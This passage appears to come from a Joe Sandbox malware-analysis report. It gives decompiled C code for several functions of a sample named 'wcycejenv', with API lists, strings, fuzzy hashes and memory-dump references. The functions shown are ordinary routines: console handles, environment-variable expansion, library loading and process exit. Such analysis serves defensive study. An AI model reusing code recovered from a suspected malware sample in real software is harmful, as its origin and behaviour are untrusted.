						 *((intOrPtr*)(_v20 + (4 << 1))) = GetStdHandle(0xfffffff4);
						_t83 = _v8;
						 *((char*)(_t83 + (1 << 1))) =  *(_v8 + (1 << 1)) | 0x00000001;
						return _t83;
					}
					_t63 = _v8;
					if(( *(_t63 + (1 << 1)) & 0x00000001) != 0) {
						goto L13;
					}
				}
				return _t63;
			}

0x00405da6
0x00405db1
0x00405dbe
0x00405dc2
0x00405dc8
0x00405dd1
0x00405de6
0x00405df0
0x00405dff
0x00405df2
0x00405df2
0x00405df2
0x00405e05
0x00405e11
0x00405e1a
0x00405e23
0x00405e33
0x00405e42
0x00405e4c
0x00405e53
0x00405e7c
0x00405e9c
0x00405e9c
0x00405ea3
0x00405ecc
0x00405eec
0x00405eec
0x00405ef3
0x00405f08
0x00405f1a
0x00405f35
0x00405f38
0x00000000
0x00405f38
0x00405efc
0x00405f06
0x00000000
0x00000000
0x00405f06
0x00405f3e

APIs

GetStartupInfoW.KERNEL32(00000044), ref: 00405DB1
GetStdHandle.KERNEL32(000000F6,?,?,?), ref: 00405E6B
GetStdHandle.KERNEL32(000000F5,?,?,?), ref: 00405EBB
GetStdHandle.KERNEL32(000000F4,?,?,?), ref: 00405F0A

Strings

D, xrefs: 00405DA6

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: Handle$InfoStartup
String ID: D
API String ID: 3003166346-2746444292
Opcode ID: 7d541e1fb77bb1c15b00c359b454ad045f2b2417dae233bcdb08ba0ac09f7ca0
Instruction ID: 1ac52cc3ac8732846e4cd3dfc6a2776130de8c49a0a3ee71e41de252f928e39e
Opcode Fuzzy Hash: 7d541e1fb77bb1c15b00c359b454ad045f2b2417dae233bcdb08ba0ac09f7ca0
Instruction Fuzzy Hash: A1517E75E04519DBDB18CF98C490BEEBBB1FF89300F1480AAD911AB3C5C6399E81DB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040370D Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 110
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0040370D() {
				signed int _t273;
				signed int _t278;
				signed int _t279;
				signed int _t280;
				long _t281;
				signed int _t284;
				signed int _t287;
				signed int _t302;
				signed int _t304;
				WCHAR* _t310;
				signed int _t341;
				signed int _t349;
				signed int _t378;
				void* _t396;
				signed short* _t405;
				signed char* _t412;
				signed int _t427;
				signed char* _t485;
				signed int _t516;
				void* _t555;
				void* _t557;
				void* _t559;
				void* _t560;

				if(( *( *(_t555 - 8)) & 0x0000ffff) == 0x3a) {
					_t405 = E004088E2( &(( *(_t555 - 8))[1]),  *(_t555 + 0xc) & 0x0000ffff);
					_t557 = _t557 + 8;
					 *(_t555 - 0x48) = _t405;
					if( *(_t555 - 0x48) != 0) {
						 *(_t555 - 8) =  *(_t555 - 0x48);
					}
				}
				_t11 = ( *(_t555 - 8) -  *(_t555 + 8) >> 1) + 2; // 0x2
				E00408CA0(_t555 - 0x806c,  *(_t555 + 8), ( *(_t555 - 8) -  *(_t555 + 8) >> 1) + _t11);
				 *((short*)(_t555 + ( *(_t555 - 8) -  *(_t555 + 8) >> 1) * 2 - 0x806a)) = 0;
				_t411 = _t555 - 0x806a;
				_t273 = E004088E2(_t555 - 0x806a, 0x3a);
				_t559 = _t557 + 0x14;
				 *(_t555 - 4) = _t273;
				if( *(_t555 - 4) != 0) {
					 *( *(_t555 - 4)) =  *(_t555 + 0xc);
					 *(_t555 - 0x10) =  *( *(_t555 - 4) + 2);
					_t411 =  *(_t555 - 4);
					 *( *(_t555 - 4) + 2) = 0;
				}
				if(( *(_t555 + 0xc) & 0x0000ffff) == 0x21) {
					 *((short*)(_t555 + 0xffffffffffff7f94)) = 0x25;
					_t411 = 0x25;
					 *((short*)(_t555 + ( *(_t555 - 8) -  *(_t555 + 8) >> 1) * 2 - 0x806c)) = 0x25;
				}
				do {
					_t485 =  *0x4494a8; // 0x4533bc
					if(( *_t485 & 8) != 0) {
						_t412 =  *0x4494a8; // 0x4533bc
						 *(_t555 - 0x68) = _t412;
						 *(_t555 - 0x6c) = 3;
						_t396 = E00406150(_t555 - 0x806c);
						_t411 =  *(_t555 - 0x6c);
						E00406000( *(_t555 - 0x6c),  *(_t555 - 0x68), "WCMD_expand_envvar", "Retrieving contents of %s\n", _t396);
						_t559 = _t559 + 0x14;
					}
				} while (0 != 0);
				if(E00403FE0(_t411, _t555 - 0x806c, L"ERRORLEVEL") == 0) {
					_t278 = E00403FE0(_t555 - 0x806c, _t555 - 0x806c, L"DATE");
					__eflags = _t278;
					if(_t278 == 0) {
						_t279 = E00403FE0(_t555 - 0x806c, _t555 - 0x806c, L"TIME");
						__eflags = _t279;
						if(_t279 == 0) {
							_t280 = E00403FE0(_t555 - 0x806c, _t555 - 0x806c, L"CD");
							__eflags = _t280;
							if(_t280 == 0) {
								_t416 = _t555 - 0x806c;
								_t281 = E00403FE0(_t555 - 0x806c, _t555 - 0x806c, L"RANDOM");
								__eflags = _t281;
								if(__eflags == 0) {
									0x400000(_t555 - 0x406c);
									 *(_t555 - 0xc) = ExpandEnvironmentStringsW(_t555 - 0x806c, _t555 - 0x406c, _t281);
								} else {
									_t378 = E00415A81(_t416, __eflags) & 0x80007fff;
									__eflags = _t378;
									if(_t378 < 0) {
										_t378 = (_t378 - 0x00000001 | 0xffff8000) + 1;
										__eflags = _t378;
									}
									wsprintfW(_t555 - 0x406c, L"%d", _t378);
									_t559 = _t559 + 0xc;
									 *(_t555 - 0xc) = lstrlenW(_t555 - 0x406c);
								}
							} else {
								GetCurrentDirectoryW(0x2000, _t555 - 0x406c);
								 *(_t555 - 0xc) = lstrlenW(_t555 - 0x406c);
							}
						} else {
							GetTimeFormatW(0x400, 2, 0, 0, _t555 - 0x406c, 0x2000);
							 *(_t555 - 0xc) = lstrlenW(_t555 - 0x406c);
						}
					} else {
						GetDateFormatW(0x400, 1, 0, 0, _t555 - 0x406c, 0x2000);
						 *(_t555 - 0xc) = lstrlenW(_t555 - 0x406c);
					}
				} else {
					wsprintfW(_t555 - 0x406c, L"%d",  *0x457190);
					_t559 = _t559 + 0xc;
					 *(_t555 - 0xc) = lstrlenW(_t555 - 0x406c);
				}
				if( *(_t555 - 0xc) != 0) {
					_t284 = lstrcmpiW(_t555 - 0x806c, _t555 - 0x406c);
					__eflags = _t284;
					if(_t284 != 0) {
						__eflags =  *(_t555 - 4);
						if( *(_t555 - 4) != 0) {
							 *( *(_t555 - 4)) = 0x3a;
							_t420 =  *(_t555 - 0x10);
							 *( *(_t555 - 4) + 2) =  *(_t555 - 0x10);
							__eflags = ( *(_t555 - 0x10) & 0x0000ffff) - 0x7e;
							if(( *(_t555 - 0x10) & 0x0000ffff) != 0x7e) {
								_t287 = E00408A33(_t420,  *(_t555 - 4), "=");
								_t560 = _t559 + 8;
								 *(_t555 - 0x40) = _t287;
								 *(_t555 - 0x44) =  *(_t555 - 0x40) + 2;
								 *(_t555 - 0x14) = 0;
								__eflags =  *(_t555 - 0x40);
								if( *(_t555 - 0x40) != 0) {
									 *(_t555 - 0x38) = E00405D10( &(( *(_t555 - 8))[1]));
									 *((short*)(_t555 + lstrlenW(_t555 - 0x806c) * 2 - 0x806e)) = 0;
									 *( *(_t555 - 0x40)) = 0;
									 *(_t555 - 0x24) = E00405D10(_t555 - 0x406c);
									CharUpperBuffW( *(_t555 - 0x24), lstrlenW(_t555 - 0x406c));
									 *(_t555 - 0x2c) = E00405D10( *(_t555 - 4) + 2);
									CharUpperBuffW( *(_t555 - 0x2c), lstrlenW( *(_t555 - 4) + 2));
									_t427 =  *(_t555 - 4);
									__eflags = ( *(_t427 + 2) & 0x0000ffff) - 0x2a;
									if(( *(_t427 + 2) & 0x0000ffff) != 0x2a) {
										 *(_t555 - 0x28) =  *(_t555 - 0x24);
										 *(_t555 - 0x18) =  *(_t555 + 8);
										__eflags = 0;
										 *( *(_t555 + 8)) = 0;
										while(1) {
											_t302 = E00408A33( *(_t555 - 0x28),  *(_t555 - 0x28),  *(_t555 - 0x2c));
											_t560 = _t560 + 8;
											 *(_t555 - 0x14) = _t302;
											__eflags =  *(_t555 - 0x14);
											if( *(_t555 - 0x14) == 0) {
												break;
											}
											lstrcpynW( *(_t555 - 0x18), _t555 + ( *(_t555 - 0x28) -  *(_t555 - 0x24) >> 1) * 2 - 0x406c, ( *(_t555 - 0x14) -  *(_t555 - 0x28) >> 1) + 1);
											 *(_t555 - 0x18) =  &(( *(_t555 - 0x18))[ *(_t555 - 0x14) -  *(_t555 - 0x28) >> 1]);
											lstrcatW( *(_t555 - 0x18),  *(_t555 - 0x44));
											 *(_t555 - 0x18) =  &(( *(_t555 - 0x18))[lstrlenW( *(_t555 - 0x44))]);
											 *(_t555 - 0x28) =  *(_t555 - 0x14) + lstrlenW( *(_t555 - 0x2c)) * 2;
										}
										_t304 =  *(_t555 - 0x28) -  *(_t555 - 0x24);
										__eflags = _t304;
										lstrcatW( *(_t555 - 0x18), _t555 + (_t304 >> 1) * 2 - 0x406c);
										lstrcatW( *(_t555 - 0x18),  *(_t555 - 0x38));
										L75:
										0x400000( *(_t555 - 0x38));
										0x400000( *(_t555 - 0x24));
										0x400000( *(_t555 - 0x2c));
										L76:
										_t310 =  *(_t555 + 8);
										L77:
										return _t310;
									}
									 *(_t555 - 0x14) = E00408A33( *(_t555 - 0x24),  *(_t555 - 0x24),  &(( *(_t555 - 0x2c))[1]));
									__eflags =  *(_t555 - 0x14);
									if( *(_t555 - 0x14) == 0) {
										lstrcpyW( *(_t555 + 8), _t555 - 0x406c);
										lstrcatW( *(_t555 + 8),  *(_t555 - 0x38));
									} else {
										lstrcpyW( *(_t555 + 8),  *(_t555 - 0x44));
										lstrcatW( *(_t555 + 8), _t555 + ( *(_t555 - 0x14) -  *(_t555 - 0x24) >> 1) * 2 - 0x406c + lstrlenW( &(( *(_t555 - 0x2c))[1])) * 2);
										lstrcatW( *(_t555 + 8),  *(_t555 - 0x38));
									}
									goto L75;
								}
								_t310 =  &(( *(_t555 + 8))[1]);
								goto L77;
							}
							 *(_t555 - 0x1c) = 0;
							 *(_t555 - 0x3c) = E004088E2( *(_t555 - 4) + 4, 0x2c);
							_t446 =  *(_t555 - 4) + 4;
							 *(_t555 - 0x30) = E004159AF( *(_t555 - 4) + 4,  *(_t555 - 4) + 4, 0, 0xa);
							__eflags =  *(_t555 - 0x3c);
							if( *(_t555 - 0x3c) != 0) {
								__eflags =  *(_t555 - 0x3c) + 2;
								 *(_t555 - 0x1c) = E004159AF(_t446,  *(_t555 - 0x3c) + 2, 0, 0xa);
							}
							__eflags =  *(_t555 - 0x30);
							if( *(_t555 - 0x30) < 0) {
								_t516 =  *(_t555 - 0x30);
								_t341 =  *(_t555 - 0xc);
								_t127 = _t516 - 1; // -1
								__eflags = _t341 + _t127;
								if(_t341 + _t127 >= 0) {
									_t132 =  *(_t555 - 0x30) - 1; // -1
									 *(_t555 - 0x50) =  *(_t555 - 0xc) + _t132;
								} else {
									 *(_t555 - 0x50) = 0;
								}
								 *((intOrPtr*)(_t555 - 0x20)) = _t555 +  *(_t555 - 0x50) * 2 - 0x406c;
							} else {
								__eflags =  *(_t555 - 0x30) -  *(_t555 - 0xc);
								if( *(_t555 - 0x30) >=  *(_t555 - 0xc)) {
									 *(_t555 - 0x4c) =  *(_t555 - 0xc);
								} else {
									 *(_t555 - 0x4c) =  *(_t555 - 0x30);
								}
								 *((intOrPtr*)(_t555 - 0x20)) = _t555 +  *(_t555 - 0x4c) * 2 - 0x406c;
							}
							__eflags =  *(_t555 - 0x3c);
							if( *(_t555 - 0x3c) != 0) {
								__eflags =  *(_t555 - 0x1c);
								if( *(_t555 - 0x1c) >= 0) {
									__eflags =  *(_t555 - 0x1c) -  *(_t555 - 0xc) - ( *((intOrPtr*)(_t555 - 0x20)) - _t555 - 0x406c >> 1) + 1;
									if( *(_t555 - 0x1c) >=  *(_t555 - 0xc) - ( *((intOrPtr*)(_t555 - 0x20)) - _t555 - 0x406c >> 1) + 1) {
										_t349 =  *(_t555 - 0xc) - ( *((intOrPtr*)(_t555 - 0x20)) - _t555 - 0x406c >> 1) + 1;
										__eflags = _t349;
										 *(_t555 - 0x54) = _t349;
									} else {
										 *(_t555 - 0x54) =  *(_t555 - 0x1c);
									}
									 *(_t555 - 0x1c) =  *(_t555 - 0x54);
									__eflags =  &(( *(_t555 - 8))[1]);
									E00405770( &(( *(_t555 - 8))[1]),  *(_t555 + 8),  &(( *(_t555 - 8))[1]),  *((intOrPtr*)(_t555 - 0x20)),  *(_t555 - 0x1c));
								} else {
									_t147 =  *(_t555 - 0x1c) - 1; // -1
									 *(_t555 - 0x34) =  *(_t555 - 0xc) + _t147 - ( *((intOrPtr*)(_t555 - 0x20)) - _t555 - 0x406c >> 1);
									__eflags =  *(_t555 - 0x34) -  *(_t555 - 0xc);
									if( *(_t555 - 0x34) <=  *(_t555 - 0xc)) {
										__eflags =  *(_t555 - 0x34);
										if( *(_t555 - 0x34) < 0) {
											 *(_t555 - 0x34) = 0;
										}
									} else {
										 *(_t555 - 0x34) =  *(_t555 - 0xc);
									}
									E00405770( &(( *(_t555 - 8))[1]),  *(_t555 + 8),  &(( *(_t555 - 8))[1]),  *((intOrPtr*)(_t555 - 0x20)),  *(_t555 - 0x34));
								}
							} else {
								E00405770( *((intOrPtr*)(_t555 - 0x20)),  *(_t555 + 8),  &(( *(_t555 - 8))[1]),  *((intOrPtr*)(_t555 - 0x20)), 0xffffffff);
							}
							goto L76;
						}
						E00405770(_t555 - 0x406c,  *(_t555 + 8),  &(( *(_t555 - 8))[1]), _t555 - 0x406c, 0xffffffff);
						_t310 =  *(_t555 + 8);
						goto L77;
					}
					__eflags =  *(_t555 - 4);
					if( *(_t555 - 4) != 0) {
						 *( *(_t555 - 4)) = 0x3a;
						 *( *(_t555 - 4) + 2) =  *(_t555 - 0x10);
					}
					__eflags =  *0x454c24;
					if( *0x454c24 != 0) {
						__eflags =  *(_t555 - 4);
						if( *(_t555 - 4) != 0) {
							 *(_t555 - 0xc) = lstrlenW(_t555 - 0x806c);
							 *((short*)(_t555 +  *(_t555 - 0xc) * 2 - 0x806e)) = 0;
							__eflags =  *(_t555 - 4) - _t555 - 0x806a;
							if( *(_t555 - 4) != _t555 - 0x806a) {
								__eflags =  &(( *(_t555 - 8))[1]);
								E00405770( *(_t555 - 4) + 2,  *(_t555 + 8),  &(( *(_t555 - 8))[1]),  *(_t555 - 4) + 2, 0xffffffff);
							} else {
								E00405770( *(_t555 - 4),  *(_t555 + 8),  &(( *(_t555 - 8))[1]),  *(_t555 - 4), 0xffffffff);
							}
						} else {
							E00405770( &(( *(_t555 - 8))[1]),  *(_t555 + 8),  &(( *(_t555 - 8))[1]), 0, 0);
						}
						_t310 =  *(_t555 + 8);
					} else {
						_t310 =  &(( *(_t555 - 8))[1]);
					}
					goto L77;
				}
				_t310 =  &(( *(_t555 - 8))[1]);
				goto L77;
			}

0x00403723
0x00403731
0x00403736
0x00403739
0x00403740
0x00403745
0x00403745
0x00403740
0x00403750
0x00403760
0x00403772
0x0040377c
0x00403783
0x00403788
0x0040378b
0x00403792
0x0040379b
0x004037a5
0x004037ab
0x004037ae
0x004037ae
0x004037b9
0x004037c8
0x004037d8
0x004037dd
0x004037dd
0x004037e5
0x004037e5
0x004037f1
0x004037f3
0x004037f9
0x004037fc
0x0040380a
0x0040381e
0x00403822
0x00403827
0x00403827
0x0040382a
0x00403841
0x00403880
0x00403885
0x00403887
0x004038c7
0x004038cc
0x004038ce
0x0040390e
0x00403913
0x00403915
0x00403940
0x00403947
0x0040394c
0x0040394e
0x00403992
0x004039ac
0x00403950
0x00403955
0x00403955
0x0040395a
0x00403962
0x00403962
0x00403962
0x00403970
0x00403976
0x00403986
0x00403986
0x00403917
0x00403923
0x00403936
0x00403936
0x004038d0
0x004038e7
0x004038fa
0x004038fa
0x00403889
0x004038a0
0x004038b3
0x004038b3
0x00403843
0x00403856
0x0040385c
0x0040386c
0x0040386c
0x004039b3
0x004039ce
0x004039d4
0x004039d6
0x00403a89
0x00403a8d
0x00403ab8
0x00403abe
0x00403ac2
0x00403aca
0x00403acd
0x00403c5c
0x00403c61
0x00403c64
0x00403c6d
0x00403c70
0x00403c77
0x00403c7b
0x00403c94
0x00403ca6
0x00403cb3
0x00403cc2
0x00403cd7
0x00403ce9
0x00403cfe
0x00403d04
0x00403d0b
0x00403d0e
0x00403d9f
0x00403da5
0x00403da8
0x00403dad
0x00403db0
0x00403db8
0x00403dbd
0x00403dc0
0x00403dc3
0x00403dc7
0x00000000
0x00000000
0x00403de9
0x00403dfd
0x00403e08
0x00403e1e
0x00403e31
0x00403e31
0x00403e3c
0x00403e3c
0x00403e4d
0x00403e5b
0x00403e61
0x00403e65
0x00403e6e
0x00403e77
0x00403e7c
0x00403e7c
0x00403e7f
0x00403e83
0x00403e83
0x00403d27
0x00403d2a
0x00403d2e
0x00403d83
0x00403d91
0x00403d30
0x00403d38
0x00403d62
0x00403d70
0x00403d70
0x00000000
0x00403d97
0x00403c80
0x00000000
0x00403c80
0x00403ad3
0x00403aeb
0x00403af5
0x00403b01
0x00403b04
0x00403b08
0x00403b11
0x00403b1d
0x00403b1d
0x00403b20
0x00403b24
0x00403b4b
0x00403b4e
0x00403b51
0x00403b55
0x00403b57
0x00403b68
0x00403b6c
0x00403b59
0x00403b59
0x00403b59
0x00403b79
0x00403b26
0x00403b29
0x00403b2c
0x00403b39
0x00403b2e
0x00403b31
0x00403b31
0x00403b46
0x00403b46
0x00403b7c
0x00403b80
0x00403b9d
0x00403ba1
0x00403c0b
0x00403c0e
0x00403c2b
0x00403c2b
0x00403c2d
0x00403c10
0x00403c13
0x00403c13
0x00403c33
0x00403c41
0x00403c49
0x00403ba3
0x00403ba9
0x00403bbc
0x00403bc2
0x00403bc5
0x00403bcf
0x00403bd3
0x00403bd5
0x00403bd5
0x00403bc7
0x00403bca
0x00403bca
0x00403bef
0x00403bef
0x00403b82
0x00403b93
0x00403b93
0x00000000
0x00403c4e
0x00403aa3
0x00403aa8
0x00000000
0x00403aa8
0x004039dc
0x004039e0
0x004039ea
0x004039f4
0x004039f4
0x004039f8
0x004039ff
0x00403a0c
0x00403a10
0x00403a35
0x00403a3d
0x00403a4b
0x00403a4e
0x00403a74
0x00403a7c
0x00403a50
0x00403a61
0x00403a61
0x00403a12
0x00403a21
0x00403a21
0x00403a81
0x00403a01
0x00403a04
0x00403a04
0x00000000
0x004039ff
0x004039b8
0x00000000

APIs

wsprintfW.USER32 ref: 00403856
lstrlenW.KERNEL32(?), ref: 00403866
GetDateFormatW.KERNEL32(00000400,00000001,00000000,00000000,?,00002000,?,DATE,?,ERRORLEVEL), ref: 004038A0
lstrlenW.KERNEL32(?), ref: 004038AD
lstrcmpiW.KERNEL32(?,?), ref: 004039CE

Strings

ERRORLEVEL, xrefs: 0040382E
Retrieving contents of %s, xrefs: 00403810
WCMD_expand_envvar, xrefs: 00403815

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: lstrlen$DateFormatlstrcmpiwsprintf
String ID: ERRORLEVEL$Retrieving contents of %s$WCMD_expand_envvar
API String ID: 2174006433-3859839659
Opcode ID: 67a2a3db736616ccd4f6073052a0a3f5def2946f35a633b617a90c9b288ccd37
Instruction ID: 5bac5b3252c83323bd9280ff1aa8e76fef0298c6c5ff48768ac15e62e57eff64
Opcode Fuzzy Hash: 67a2a3db736616ccd4f6073052a0a3f5def2946f35a633b617a90c9b288ccd37
Instruction Fuzzy Hash: 3B4194B5900108EFCB14DFA4DC45AAE7BB9FF44305F10C16AE945A7380EB399B55CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00431E0D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00431E0D(intOrPtr* _a4, intOrPtr _a8, char _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t7 =  &_a16; // 0x432044
						_t14 = E00432DAF( *_t7, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E00432DAF(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E0042C0FF(GetLastError());
									_t17 =  *((intOrPtr*)(E0042C135(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E00431F4F(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E0042C0FF(GetLastError());
						_t17 =  *((intOrPtr*)(E0042C135(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E00431F4F(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E00431F91(_a8);
				return 0;
			}

0x00431e13
0x00431e18
0x00431e2c
0x00431e2f
0x00431e5e
0x00431e61
0x00431e69
0x00431e6b
0x00431e84
0x00431e87
0x00431e8a
0x00431e98
0x00431ea7
0x00431eaf
0x00431eb1
0x00431eca
0x00431ecd
0x00431ecd
0x00431eb3
0x00431eba
0x00431ec5
0x00431ec5
0x00431ecf
0x00431ed0
0x00000000
0x00431ed0
0x00431e8f
0x00431e94
0x00431e96
0x00000000
0x00000000
0x00000000
0x00431e96
0x00431e74
0x00431e7f
0x00000000
0x00431e7f
0x00431e31
0x00431e34
0x00431e37
0x00431e4a
0x00431e4d
0x00431e4f
0x00431e51
0x00000000
0x00431e51
0x00431e3d
0x00431e42
0x00431e44
0x00000000
0x00000000
0x00000000
0x00431e44
0x00431e1d
0x00000000

Strings

D C, xrefs: 00431E5E

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID:
String ID: D C
API String ID: 0-4068722822
Opcode ID: 98c07cbe1015822f4ecaba44a0eaf27c7909b5d9eff5c12b0ec6802532d2852c
Instruction ID: 1b7ea69025d6823877efc01603273bcf518c1a3bf3fb02c2751cdf91526534dc
Opcode Fuzzy Hash: 98c07cbe1015822f4ecaba44a0eaf27c7909b5d9eff5c12b0ec6802532d2852c
Instruction Fuzzy Hash: 2A21A771200119BFDB10AFA69C82D3B77ADAF48378F10551AF81997261EB3ADC419768

Uniqueness

Uniqueness Score: -1.00%

Function 0042C8DE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042C8DE(WCHAR* _a4) {
				struct HINSTANCE__* _t5;

				_t5 = LoadLibraryExW(_a4, 0, 0x800);
				if(_t5 != 0) {
					return _t5;
				} else {
					if(GetLastError() != 0x57 || E0042BDB8(_a4, L"api-ms-", 7) == 0 || E0042BDB8(_a4, L"ext-ms-", 7) == 0) {
						return 0;
					}
					return LoadLibraryExW(_a4, 0, 0);
				}
			}

0x0042c8ed
0x0042c8f5
0x0042c940
0x0042c8f7
0x0042c900
0x00000000
0x0042c93d
0x0042c93c
0x0042c93c

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,0042C897), ref: 0042C8ED
GetLastError.KERNEL32(?,0042C897), ref: 0042C8F7
LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 0042C935

Strings

ext-ms-, xrefs: 0042C91A
api-ms-, xrefs: 0042C904

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-$ext-ms-
API String ID: 3177248105-537541572
Opcode ID: 9d4a1a0697c6848fa4f21d00e91d823744c581d2b3d75576ed7e5311f935042b
Instruction ID: 4b8798af34c18565fbb9a00cc1e44a87aa0d5f0c720bb8a2747877d09c45c172
Opcode Fuzzy Hash: 9d4a1a0697c6848fa4f21d00e91d823744c581d2b3d75576ed7e5311f935042b
Instruction Fuzzy Hash: 25F08CB1790208B6EF201B61FC06F5A3A64AB11B40F544032F94CA81E1EB6AE960D6CC

Uniqueness

Uniqueness Score: -1.00%

Function 00428AC2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 25%

			E00428AC2(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x4492c4(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x00428ac8
0x00428acc
0x00428ad7
0x00428adf
0x00428aea
0x00428af0
0x00428af4
0x00428afb
0x00428b01
0x00428b01
0x00428b03
0x00428b08
0x00000000
0x00428b0d
0x00428b14

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00428A49,?,?,00428A11,?,?,?), ref: 00428AD7
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00428AEA
FreeLibrary.KERNEL32(00000000,?,?,00428A49,?,?,00428A11,?,?,?), ref: 00428B0D

Strings

mscoree.dll, xrefs: 00428AD0
CorExitProcess, xrefs: 00428AE2

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
